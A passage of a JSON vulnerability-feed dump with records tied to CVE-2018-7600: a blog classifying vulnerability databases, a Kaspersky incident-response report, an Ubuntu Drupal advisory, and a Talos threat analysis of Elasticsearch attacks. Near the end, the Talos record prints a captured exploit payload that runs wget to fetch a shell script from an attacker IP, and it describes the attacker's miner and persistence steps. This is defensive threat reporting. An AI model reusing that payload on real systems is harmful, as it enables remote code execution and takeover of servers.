Research](<https://www.ptsecurity.com/ww-en/analytics/threatscape/>), etc.), Media and Bug Bounty sites.\n\n\n\nFor these databases the descriptions of vulnerabilities are publicly available on the site (in html interface or downloadable data feed), or exist in a form of paid Vulnerability Intelligence service (for example, [Flexera](<https://www.flexera.com/products/software-vulnerability-management/software-vulnerability-manager.html>)).\n\nOn one side there are databases of individual vulnerabilities, the most important is [National Vulnerability Database](<https://nvd.nist.gov/>). There are also Chinese, Japanese bases that can be derived from NVD or not.\n\nOn the other side we have security bulletins, for example [RedHat Security Advisories](<https://www.redhat.com/archives/rhsa-announce/>).\n\nAnd in the middle we have a Vulnerability Databases, for which it is not critical whether they have duplicated vulnerability IDs or not.\n\nThese are the Vulnerability Databases of aggregators, vulnerability scanners, security content databases. We can say that [CIS OVAL](<https://oval.cisecurity.org/>) or [OpenVAS NVTs](<http://www.openvas.org/openvas-nvt-feed.html>) are the forms of public security content. Russian [FSTEC BDU Vulnerability Database](<https://bdu.fstec.ru/vul>) also has individual vulnerabilities and security bulletins.\n\n### Classification\n\nI have the following groups:\n\n 1. Individual Vulnerabilities\n 2. Individual Vulnerabilities -> Government\n 3. Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators\n 4. Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators\n 5. Mixed Individual Vulnerabilities and Security Bulletins -> Government\n 6. Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules\n 7. Security Bulletins\n 8. Security Bulletins -> All software in repository\n\n### Registry\n\nI was trying to give a link on the same [\"Drupalgedon2\" CVE-2018-7600](<https://github.com/jirojo2/drupalgeddon2>) vulnerability in examples, where it was possible. I mentioned the ways to grab all the entries from particular Vulnerability Database in the Aggregation column. Most of this methods are provided by the owner of the Database (\"official\") or in a form of [Vulners collections](<https://avleonov.com/2016/10/24/processing-vulners-collections-using-python/>).\n\nName | Classification Group | Description | Example of content | Aggregation \n---|---|---|---|--- \n[Mitre CVE](<https://cve.mitre.org/>) | Individual Vulnerabilities | Coordinate the release of CVE identifiers | [CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) | [Official](<https://cve.mitre.org/data/downloads/index.html>) \n[IBM X force](<https://exchange.xforce.ibmcloud.com/>) | Individual Vulnerabilities | Threat and Vulnerability Intelligence service | [CVE-2018-7600](<https://exchange.xforce.ibmcloud.com/vulnerabilities/140913>) | n/a \n[NIST NVD](<https://nvd.nist.gov/>) | Individual Vulnerabilities -> Government | The NVD is the U.S. government repository of standards based vulnerability management data | [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) | [Official](<https://nvd.nist.gov/vuln/data-feeds>), [Vulners](<https://vulners.com/stats>) \n[CNNVD](<http://www.cnnvd.org.cn/>) | Individual Vulnerabilities -> Government | China National Vulnerability Database of Information Security | [CNNVD-201803-1136](<http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201803-1136>) | [Official](<http://www.cnnvd.org.cn/web/xxk/xmlDown.tag>) \n[CNVD](<http://www.cnvd.org.cn/>) | Individual Vulnerabilities -> Government | China National Vulnerability Database | [CNTA-2018-0012](<http://www.cnvd.org.cn/webinfo/show/4463>) | n/a \n[JVN](<https://jvn.jp>) | Mixed Individual Vulnerabilities and Security Bulletins -> Government | Japan Vulnerability Notes | [JVN#65268217](<https://jvn.jp/jp/JVN65268217/index.html>) | n/a \n[BDU Fstec](<https://bdu.fstec.ru/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Government | Russian Data Security Threats Database | [BDU:2018-00749](<https://bdu.fstec.ru/vul/2018-00749>) | [Official](<https://bdu.fstec.ru/vul>) \n[Risk Based Security VulnDB](<https://vulndb.cyberriskanalytics.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Intelligence vendor | n/a | n/a \n[Flexera](<https://www.flexera.com/products/software-vulnerability-management/software-vulnerability-manager.html>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Intelligence vendor | n/a | n/a \n[Beyond Security SecuriTeam](<http://www.securiteam.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Management vendor | [CVE-2016-9939](<http://www.securiteam.com/securitynews/5LP3G20MKY.html>) | n/a \n[VulDB](<https://vuldb.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | \"Number 1 vulnerability database worldwide with more than 117000 entries available.\" | [CVE-2018-7600](<https://vuldb.com/?id.115197>) | n/a \n[vFeed](<https://vfeed.io/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Trusted Vulnerability & Threat Intelligence Database\" | n/a | [Official](<https://vfeed.io/pricing/>) \n[Vulners](<https://vulners.com/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Complete Vulnerability DataBase & Security Scanne\" | [CVE-2018-7600](<https://vulners.com/cve/CVE-2018-7600>) | [Official](<https://vulners.com/cve/stats>) \n[Tenable](<https://www.tenable.com/plugins>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | Tenable Nessus Attack Scripting Language (NASL) plugins | [CVE-2018-7600](<https://www.tenable.com/plugins/nessus/109041>) | [Vulners](<https://vulners.com/stats>) \n[Snyk](<https://snyk.io/vuln/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Snyk helps you use open source and stay secure.\" | [CVE-2018-7600](<https://snyk.io/vuln/SNYK-PHP-DRUPALCORE-72112>) | n/a \n[Rapid7](<https://www.rapid7.com/db>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Vulnerability & Exploit Database\" | [CVE-2018-7600](<https://www.rapid7.com/db/vulnerabilities/drupal-cve-2018-7600>) | n/a \n[Altx-Soft OVAL Repository](<https://ovaldb.altx-soft.ru/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | ALTEX-SOFT-owned OVAL repository | [CVE-2018-7600](<https://ovaldb.altx-soft.ru/Definition.aspx?id=oval:com.altx-soft.nix:def:19053>) | n/a \n[SecPod SCAP Repo](<https://www.scaprepo.com/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | SecPod-owned OVAL repository | [CVE-2018-7600](<https://www.scaprepo.com/control.jsp?command=relation&relationId=oval:org.secpod.oval:def:603336>) | n/a \n[OpenVAS NVT](<http://www.openvas.org/openvas-nvt-feed.html>) | Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules | \"Public feed of Network Vulnerability Tests (NVTs) for the OpenVAS project\" | n/a | [Vulners](<https://vulners.com/stats>) \n[CIS OVAL](<https://oval.cisecurity.org/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules | Main database of OVAL content sponsored by Center for Internet Security | n/a | [Official](<https://oval.cisecurity.org/repository/download>) \n[CentOS CESA](<https://lists.centos.org/pipermail/centos-announce/>) | Security Bulletins -> All software in repository | The CentOS-announce Archives | [CESA-2014:0376](<https://lists.centos.org/pipermail/centos-announce/2014-April/020249.html>) | [Vulners](<https://vulners.com/stats>) \n[Ubuntu USN](<https://usn.ubuntu.com/>) | Security Bulletins -> All software in repository | Ubuntu security notices | [USN-2165-1](<https://usn.ubuntu.com/2165-1/>) | [Vulners](<https://vulners.com/stats>) \n[RedHat RHSA](<https://www.redhat.com/archives/rhsa-announce/>) | Security Bulletins -> All software in repository | The RedHat-announce Archives | [RHSA-2014:0376](<https://access.redhat.com/errata/RHSA-2014:0376>) | [Vulners](<https://vulners.com/stats>) \n[Debian DSA](<https://www.debian.org/security/>) | Security Bulletins -> All software in repository | Debian Security Advisories | [DSA-4156-1](<https://www.debian.org/security/2018/dsa-4156>) | [Vulners](<https://vulners.com/stats>) \nMicrosoft KB | Security Bulletins | Microsoft Knowledge Base | [KB4013389](<https://support.microsoft.com/kb/4013389>) | n/a \n[Microsoft MS](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/securitybulletins>) | Security Bulletins | Microsoft Security Bulletin | [MS17-10](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>) | n/a \n[CISCO SA](<https://tools.cisco.com/security/center/mpublicationListingDetails.x?docType=CiscoSecurityAdvisory>) | Security Bulletins | Cisco Security Advisories | [cisco-sa-20180521](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180521-cpusidechannel>) | [Vulners](<https://vulners.com/stats>) \n[OpenSSL Vulnerabilities](<https://www.openssl.org/news/vulnerabilities.html>) | Security Bulletins | OpenSSL Vulnerabilities | [CVE-2018-0737](<https://www.openssl.org/news/secadv/20180416.txt>) | [Vulners](<https://vulners.com/stats>) \n[Apache](<https://httpd.apache.org/security_report.html>) | Security Bulletins | Security Problems with the Apache HTTP Server | [CVE-2017-9798](<https://httpd.apache.org/security/vulnerabilities_22.html>) | [Vulners](<https://vulners.com/stats>) \n[Mozilla MFSA](<https://www.mozilla.org/en-US/security/advisories/>) | Security Bulletins | Mozilla Foundation Security Advisories | [mfsa2018-13](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/>) | [Vulners](<https://vulners.com/stats>) \n \n### Other Vulnerability Databases\n\nOf course this table is far from being complete. It's a basic structure, just to give an overall picture.\n\nYou can find more:\n\n * Different Vulnerability Databases in [Vulnerability Database Catalog by FIRST.org](<https://www.first.org/global/sigs/vrdx/vdb-catalog>).\n * Security Bulletins for different Operating Systems and Software at [Vulners.com stats page](<https://vulners.com/stats>) (blocks \"Unix\" and \"Software\").\n * Bases of OVAL content listed at [MITRE OVAL Product List](<https://oval.mitre.org/adoption/productlist.html>) (it is in archive state; see the type \"Definition Repository\")\n\nDo you know any other interesting sources about known software vulnerabilities? Feel free to mention them in the comments bellow.\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-05T15:57:41", "type": "avleonov", "title": "Vulnerability Databases: Classification and Registry", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9939", "CVE-2017-9798", "CVE-2018-0737", "CVE-2018-7600"], "modified": "2018-06-05T15:57:41", "id": "AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "href": "http://feedproxy.google.com/~r/avleonov/~3/o1m4yya8LXc/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim's organization and we have no information on all of their findings \u2013 hence the 'Unknown reasons' on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that's not showing distrubution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization's network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can't be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.\n\nLet's weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller & Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary's activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary's activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. \n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn't have a specialist in threat hunting or they are managed by an external SOC that doesn't have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "cvss3": {}, "published": "2020-08-06T10:00:34", "type": "securelist", "title": "Incident Response Analyst Report 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "modified": "2020-08-06T10:00:34", "id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-01-26T15:26:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * drupal7 \\- fully-featured content management framework\n\nIt was discovered that Drupal did not properly process certain input. An \nattacker could use this vulnerability to execute arbitrary code or \ncompletely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)\n\nIt was discovered that password reset URLs in Drupal could be forged. An \nattacker could use this vulnerability to gain access to another user's \naccount. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)\n\nIt was discovered that Drupal did not properly protect against open \nredirects. An attacker could use this vulnerability to send unsuspecting \nusers to 3rd party sites and potentially carry out phishing attacks. \nThis issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-15T00:00:00", "type": "ubuntu", "title": "Drupal vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2559", "CVE-2015-2749", "CVE-2015-2750", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2021-03-15T00:00:00", "id": "USN-4773-1", "href": "https://ubuntu.com/security/notices/USN-4773-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential 